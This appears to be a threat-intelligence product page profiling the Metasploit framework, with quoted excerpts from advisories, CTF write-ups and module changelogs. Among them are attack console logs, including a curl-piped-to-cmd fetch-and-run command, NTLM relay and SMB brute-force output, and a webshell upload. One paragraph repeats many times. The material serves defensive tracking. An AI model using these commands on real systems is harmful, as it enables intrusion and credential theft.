Metasploit is an open-source exploitation and post-exploitation framework created by HD Moore and widely used by security professionals, penetration testers, and threat actors. It is not a single malware family but a modular offensive framework that provides exploit modules, payload generation, shellcode, and interactive post-exploitation capabilities, most notably through Meterpreter. In intrusion reporting, Metasploit commonly appears as an operator tool used after initial compromise to exploit public-facing applications, execute shellcode, obtain remote interactive access, move laterally across Windows environments, and support follow-on actions such as credential theft when paired with tools like Mimikatz. Metasploit-generated shellcode and payloads have also been embedded in malicious delivery chains, including macro-enabled Office documents and trojanized binaries, and have been observed in targeted campaigns involving espionage and ransomware actors. Reported users include state-linked and criminal operators such as Turla, Red Menshen, Sandworm, Lotus Blossom-associated activity, and Cactus-linked intrusions. The framework has been used against enterprise servers, including Atlassian Confluence, and against older Windows systems through public exploit modules such as BlueKeep. Because Metasploit is a dual-use framework rather than a dedicated malware strain, its presence typically indicates exploitation, remote access enablement, or post-exploitation activity rather than a standalone malware infection.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
28 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-44932 closely parallels CVE-2018-1111 (DynoRoot), a DHCP command injection vulnerability in Red Hat Enterprise Linux 6 and 7... Both vulnerabilities share the identical fundamental flaw: DHCP client data from an untrusted network source flows through insufficient sanitization into a shell evaluation context.
Conversation Add OpenCATS installer PHP code injection module ( CVE-2026-27760 ) ... added this to Metasploit Kanban
By using the public Metasploit implementation of this exploit, access was granted to this system with Administrator access.
Security researchers, including Unit 42, have documented the use of coercion tools such as PetitPotam (CVE-2021-36942) in actual attacks. Microsoft has issued security advisories acknowledging the exploitation potential of this CVE.
In May 2022, the Cybersecurity and Infrastructure Security Agency (CISA) reported that a Russian state-sponsored group was exploiting PrintNightmare, CVE-2021-34527. This exploit enabled the threat actor to access cloud and email accounts and exfiltrate documents. CISA lists this CVE in its Known Exploited Vulnerabilities catalog.
This critical flaw (CVE-2012-10019) enabled attackers to upload and execute arbitrary files—most notably, PHP shells—without any authentication, leading to full site compromise and potential server takeover.
Check Point researchers said the tool is being discussed on underground forums, where hackers are exchanging instructions on how to deploy it against three Citrix NetScaler flaws disclosed last week: CVE-2025-7775, CVE-2025-7776 and CVE-2025-8424. The most critical of these, CVE-2025-7775, allows unauthenticated remote code execution.
Rapid7 Labs discovered a new authentication bypass vulnerability affecting Cisco Catalyst SD-WAN Controller (formerly known as vSmart), CVE-2026-20182. This new authentication bypass vulnerability affects the “vdaemon” service over DTLS (UDP port 12346)... a remote unauthenticated attacker can leverage CVE-2026-20182 to become an authenticated peer of the target appliance, and perform privileged operations, such as injecting an attacker controlled public key into the vmanage-admin user account’s authorized SSH keys file.
On Friday, that dreaded day arrived when the Metasploit framework—an open source tool used by white hat and black hat hackers alike—released just such an exploit into the wild.
На момент публикации CVE-2026-31431 не зарегистрирован в NVD... Copy Fail - local privilege escalation... Metasploit-модуль опубликован в день раскрытия... PoC для Kubernetes с escape на уровень ноды опубликован на GitHub... CISA добавляет в KEV.
This activity can be associated with a malicious plugin installed by metasploit for remote code execution... References ... CVE-2024-27198/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2024_27198.rb ... critical JetBrains TeamCity on-premises ... CVE-2024-27198 and CVE-2024-27199 JetBrains TeamCity multiple authentication bypass vulnerabilities fixed.
The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
Additional ClamAV signatures include "PUA.Unix.File.Metasploit" entries related to ongoing exploitation campaigns.
Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
The content repeatedly references public exploit availability and notes that “A Metasploit module was made available…” for multiple CVEs; it also states EPSS uses “MetaSploit” as a data source and that removal/republishing of a Metasploit module materially changed EPSS scores.
A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server... The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Turla operators also use publicly available tools such as Mimikatz and Metasploit when they help the intrusion blend into normal administrative activity.
During post-exploitation, the operators used Metasploit to facilitate movement across Windows systems and Mimikatz for LSASS credential dumping, enabling access to higher-privileged accounts on the control plane of the transport network.
Beyond the custom backdoor, the Rapid7 researchers observed the deployment of Cobalt Strike and Metasploit frameworks, noting that the campaign was characterized by highly surgical targeting of government, telecommunications, and financial sectors rather than a broad, indiscriminate infection of the general user base.
Tools: SpicyOmelette, Cobalt Strike, Meterpreter, Mimikatz, CobtInt, ATMSpitter, Carbanak, Buhtrap, Cyst, Metasploit.
Four more victims had ongoing command and control activity using commercial frameworks such as Cobalt Strike, Metasploit and other Remote Access Trojans (RATs).
The phishing emails contained a link to the domain docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com where John Hammond’s reCAPTCHA Phish POC was used to deliver Metasploit payloads with the C2 IP address 203.161.50[.]145
36 distinct techniques documented for this family, organized by ATT&CK tactic.
[*] Executing whoami /all on #<Session:meterpreter 100.124.1.234:50770 (172.18.18.173) "windev\User @ WINDEV">...
[*] Command to execute on target: curl -s http://10.5.135.210:80/q|cmd
allowing attacker to perform arbitrary command execution on the system ... run the exploit to gain RCE on the system
modules/exploits/multi/http/wp_plugin_pix_unauth_rce_cve_2026_3891.rb ... [+] The target appears to be vulnerable. ... Payload uploaded successfully. Triggering at /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/UOqMnDi.php...
EternalBlue (MS17-010) - уязвимость в SMBv1, удалённое выполнение кода без аутентификации.
Six accounts came back with valid credentials, all with the same password. Multiple SMB sessions opened automatically.
action_remove aces.delete_if { |ace| ace.body.sid == delegate_from[:objectSid].first } ... Removed 1 matching ACE.
Conversation Fix ACE SID comparion in RBCD module ... msf auxiliary(admin/ldap/rbcd) > read ... Allowed accounts: ... msf auxiliary(admin/ldap/rbcd) > remove ... Removed 1 matching ACE. [+] Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Six accounts came back with valid credentials, all with the same password. Multiple SMB sessions opened automatically.
action_remove aces.delete_if { |ace| ace.body.sid == delegate_from[:objectSid].first } ... Removed 1 matching ACE.
Conversation Fix ACE SID comparion in RBCD module ... msf auxiliary(admin/ldap/rbcd) > read ... Allowed accounts: ... msf auxiliary(admin/ldap/rbcd) > remove ... Removed 1 matching ACE. [+] Successfully updated the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
Command: run post/windows/gather/checkvm Status: complete ... [+] This is a Hyper-V Virtual Machine running on physical host HYPERV
The module runs before the payload and silently skips execution if the environment score crosses a suspicion threshold.
A deserialization flaw in IBM WebSphere Application Server's SAML Web Single Sign-On component allows a low-privilege authenticated attacker to achieve remote code execution by injecting a crafted serialized Java object into a client-side cookie that the server blindly trusts.
the operators used Metasploit to facilitate movement across Windows systems and Mimikatz for LSASS credential dumping, enabling access to higher-privileged accounts
I brute-forced SMB credentials across both users and passwords: use auxiliary/scanner/smb/smb_login ... Six accounts came back with valid credentials
[*] Using URL: http://10.5.135.210/ [*] Server started. ... [*] Received GET request for /test from 10.5.134.194 ... [*] Received Type 1 message from 10.5.134.194, attempting to relay...
Worse, he could snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.
[*] Received Type 1 message from 10.5.134.194, attempting to relay... [*] Attempting to relay to 10.5.134.192:445 ... [+] Identity: WHISTLER\sandy - Successfully relayed NTLM authentication to SMB!
Conversation NtlmRelay2Self module fix check for self delegation via rbcd module
Add Kerberos trace support for forged tickets ... KerberosTicketTrace ... auxiliary/admin/kerberos/forge_ticket ... FORGE_SILVER TGS ... FORGE_GOLDEN TGT ... FORGE_DIAMOND ... FORGE_SAPPHIRE
SNMP-сервис радостно выдал имена хостов, интерфейсы и запущенные процессы.
meterpreter > async run ls [*] Queued: ls (rid: 707f8648) ... Listing: C:\Users\User\Downloads
Command: run post/windows/gather/enum_shares ... [*] No network shares were found
Command: run post/windows/gather/checkvm Status: complete ... [+] This is a Hyper-V Virtual Machine running on physical host HYPERV
I loaded it up and set the filepath to grab the flag directly ... set filepath /flag3.txt ... Using the same module, I changed the target file to pull system user information instead: set filepath /etc/passwd
Imagine you went to an attackers site while you had your webmail open in another window — the attacker could scrape your e-mail data and see what your browser sees.
12 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
103 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Publicly available exploitation and post-exploitation framework used by Turla operators during intrusions.
Penetration testing and exploitation framework referenced as part of the OT test lab tooling.
A framework referenced as part of Black Basta's prior tooling stack before moving to Breaker.
Exploitation and post-exploitation framework observed in command-and-control activity within environments later leveraged by Sandworm.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.